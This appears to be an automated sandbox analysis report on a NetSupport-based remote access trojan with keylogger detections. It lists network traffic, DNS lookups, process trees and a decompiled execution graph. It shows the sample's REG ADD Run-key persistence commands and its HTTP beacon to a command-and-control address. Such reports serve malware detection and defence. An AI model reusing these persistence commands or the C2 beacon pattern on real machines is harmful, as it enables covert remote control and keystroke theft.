                                                                                        Dec 24, 2024 17:47:53.803203106 CET4970580192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:53.811824083 CET4970680192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:53.931556940 CET8049706104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:53.935152054 CET4970680192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:53.935388088 CET4970680192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:54.055078983 CET8049706104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:55.226039886 CET8049706104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:55.226131916 CET4970680192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:55.226672888 CET4970680192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:55.226716042 CET4970680192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:55.227392912 CET4970780192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:55.349869967 CET8049707104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:55.349967957 CET4970780192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:55.350275040 CET4970780192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:55.469888926 CET8049707104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:56.649899006 CET8049707104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:56.649969101 CET4970780192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:56.650242090 CET4970780192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:56.650258064 CET4970780192.168.2.5104.26.0.231
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 17:47:52.216109037 CET5300453192.168.2.51.1.1.1
                                                                                        Dec 24, 2024 17:47:52.354018927 CET53530041.1.1.1192.168.2.5
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 24, 2024 17:47:52.216109037 CET192.168.2.51.1.1.10x997bStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 24, 2024 17:47:52.354018927 CET1.1.1.1192.168.2.50x997bNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 17:47:52.354018927 CET1.1.1.1192.168.2.50x997bNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 17:47:52.354018927 CET1.1.1.1192.168.2.50x997bNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                        • 45.76.253.210connection: keep-alivecmd=pollinfo=1ack=1
                                                                                        • geo.netsupportsoftware.com
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.54970445.76.253.2104437216C:\Users\Public\Netstat\bild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 24, 2024 17:47:52.168279886 CET218OUTPOST http://45.76.253.210/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.76.253.210Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                        Data Raw:
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549705104.26.0.231807216C:\Users\Public\Netstat\bild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 24, 2024 17:47:52.496387005 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Dec 24, 2024 17:47:53.781337976 CET1127INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 24 Dec 2024 16:47:53 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8f721366e97243c3-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nwl0fqpWj9aOs%2B5pPibZUS%2BNlzyyJl7qpE06vFDlziailyOKQLpU2dv5%2BYP2DQjlQ3RQa3dwBfFRWca3zhnIWLKoxmtnNejFhWWn%2Bg8BTapNO5piyQUp14xnyYqc0uXQmOE6fv%2BVSNw7Jct"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549706104.26.0.231807216C:\Users\Public\Netstat\bild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 24, 2024 17:47:53.935388088 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Dec 24, 2024 17:47:55.226039886 CET1120INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 24 Dec 2024 16:47:55 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8f72136feae17d24-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nXncoeYjwhQke4Ub5QxCvwIOAE79H1YfjGNsnzfxAFE5xSi7t1sixwZM1paGZ1tFBWnIcxivtqRzQBYBELq2GRwcUp%2BurUxYqeRbV0Ft3nu3dUtSF9Rw1N4tI9bMh1LNi5HPvD9eQKu9HxJ"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2081&min_rtt=2081&rtt_var=1040&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549707104.26.0.231807216C:\Users\Public\Netstat\bild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 24, 2024 17:47:55.350275040 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Dec 24, 2024 17:47:56.649899006 CET1121INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 24 Dec 2024 16:47:56 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8f721378cfad7295-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZuyri2NnFtYmfqTdNlP6gWjMRy%2B7Q%2FarxYesHy1LblTvdkZkY0sUstwcZC9GaC1ryEeizxLVy81a8Z406fWBHmbgmxS2rn0TzLSzip2DxQA0XzVOkmfRg6R8A6cSwJUAVTTI3xQVbaEyWks"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:47:48
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe"
                                                                                        Imagebase:0x3c0000
                                                                                        File size:2'138'135 bytes
                                                                                        MD5 hash:47CFCE938A71540A2039AEBD5ABE0783
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:11:47:49
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                                                        Imagebase:0x790000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:11:47:49
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:11:47:49
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                                                        Imagebase:0x30000
                                                                                        File size:59'392 bytes
                                                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:11:47:49
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                                                        Imagebase:0x30000
                                                                                        File size:59'392 bytes
                                                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:11:47:50
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\Public\Netstat\bild.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Netstat\bild.exe
                                                                                        Imagebase:0xa50000
                                                                                        File size:105'848 bytes
                                                                                        MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 29%, ReversingLabs
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:11:48:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\Public\Netstat\bild.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                        Imagebase:0xa50000
                                                                                        File size:105'848 bytes
                                                                                        MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:11:48:08
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\Public\Netstat\bild.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                        Imagebase:0xa50000
                                                                                        File size:105'848 bytes
                                                                                        MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:11:48:17
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\Public\Netstat\bild.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                        Imagebase:0xa50000
                                                                                        File size:105'848 bytes
                                                                                        MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:10.3%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:10.1%
                                                                                          Total number of Nodes:1448
                                                                                          Total number of Limit Nodes:24
                                                                                          execution_graph 23867 3d0d3a 26 API calls std::bad_exception::bad_exception 23868 3e5536 8 API calls ___vcrt_uninitialize 23869 3da537 93 API calls _swprintf 23920 3dd736 20 API calls 23818 3ef830 DeleteCriticalSection 22213 3e6428 22221 3e784c 22213->22221 22217 3e6444 22218 3e6451 22217->22218 22229 3e6454 11 API calls 22217->22229 22220 3e643c 22230 3e7735 22221->22230 22224 3e788b TlsAlloc 22225 3e787c 22224->22225 22226 3dd783 CatchGuardHandler 5 API calls 22225->22226 22227 3e6432 22226->22227 22227->22220 22228 3e63a3 20 API calls 2 library calls 22227->22228 22228->22217 22229->22220 22231 3e7765 22230->22231 22234 3e7761 22230->22234 22231->22224 22231->22225 22232 3e7785 22232->22231 22235 3e7791 GetProcAddress 22232->22235 22234->22231 22234->22232 22237 3e77d1 22234->22237 22236 3e77a1 __crt_fast_encode_pointer 22235->22236 22236->22231 22238 3e77e7 22237->22238 22239 3e77f2 LoadLibraryExW 22237->22239 22238->22234 22240 3e780f GetLastError 22239->22240 22241 3e7827 22239->22241 22240->22241 22243 3e781a LoadLibraryExW 22240->22243 22241->22238 22242 3e783e FreeLibrary 22241->22242 22242->22238 22243->22241 22245 3dc726 19 API calls ___delayLoadHelper2@8 23821 3db820 72 API calls 23870 3d9123 73 API calls 23824 3c1019 29 API calls pre_c_initialization 23891 3e7216 21 API calls 23892 3eee16 CloseHandle 22312 3dd611 22313 3dd61d ___FrameUnwindToState 22312->22313 22338 3dd126 22313->22338 22315 3dd624 22317 3dd64d 22315->22317 22415 3dda75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 22315->22415 22326 3dd68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22317->22326 22349 3e572c 22317->22349 22321 3dd66c ___FrameUnwindToState 22322 3dd6ec 22357 3ddb90 22322->22357 22326->22322 22416 3e4760 38 API calls 4 library calls 22326->22416 22333 3dd718 22335 3dd721 22333->22335 22417 3e4b67 28 API calls _abort 22333->22417 22418 3dd29d 13 API calls 2 library calls 22335->22418 22339 3dd12f 22338->22339 22419 3dd8cb IsProcessorFeaturePresent 22339->22419 22341 3dd13b 22420 3e0b66 22341->22420 22343 3dd140 22348 3dd144 22343->22348 22429 3e55b9 22343->22429 22345 3dd15b 22345->22315 22348->22315 22351 3e5743 22349->22351 22350 3dd783 CatchGuardHandler 5 API calls 22352 3dd666 22350->22352 22351->22350 22352->22321 22353 3e56d0 22352->22353 22354 3e56ff 22353->22354 22355 3dd783 CatchGuardHandler 5 API calls 22354->22355 22356 3e5728 22355->22356 22356->22326 22479 3ddea0 22357->22479 22360 3dd6f2 22361 3e567d 22360->22361 22481 3e8558 22361->22481 22363 3e5686 22364 3dd6fb 22363->22364 22485 3e88e3 38 API calls 22363->22485 22366 3dc131 22364->22366 22606 3cf353 22366->22606 22370 3dc150 22655 3d9036 22370->22655 22372 3dc159 22659 3d0722 GetCPInfo 22372->22659 22374 3dc163 ___scrt_fastfail 22375 3dc176 GetCommandLineW 22374->22375 22376 3dc185 22375->22376 22377 3dc203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22375->22377 22662 3da8d4 22376->22662 22379 3c3f5b _swprintf 51 API calls 22377->22379 22380 3dc26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 22379->22380 22675 3d9a76 LoadBitmapW 22380->22675 22383 3dc1fd 22669 3dbe0a 22383->22669 22384 3dc193 OpenFileMappingW 22386 3dc1ac MapViewOfFile 22384->22386 22387 3dc1f3 CloseHandle 22384->22387 22390 3dc1bd __vswprintf_c_l 22386->22390 22391 3dc1ea UnmapViewOfFile 22386->22391 22387->22377 22392 3dbe0a 2 API calls 22390->22392 22391->22387 22394 3dc1d9 22392->22394 22393 3dc2b3 22395 3dc2c5 DialogBoxParamW 22393->22395 22394->22391 22396 3dc2ff 22395->22396 22397 3dc318 22396->22397 22398 3dc311 Sleep 22396->22398 22400 3dc326 22397->22400 22700 3d9237 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 22397->22700 22398->22397 22401 3dc345 DeleteObject 22400->22401 22402 3dc35c DeleteObject 22401->22402 22403 3dc35f 22401->22403 22402->22403 22404 3dc390 22403->22404 22405 3dc3a2 22403->22405 22701 3dbe69 WaitForSingleObject PeekMessageW WaitForSingleObject 22404->22701 22698 3d909e 22405->22698 22407 3dc396 CloseHandle 22407->22405 22409 3dc3dc 22410 3e4a9b GetModuleHandleW 22409->22410 22411 3dd70e 22410->22411 22411->22333 22412 3e4bc4 22411->22412 22872 3e4941 22412->22872 22415->22315 22416->22322 22417->22335 22418->22321 22419->22341 22421 3e0b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22420->22421 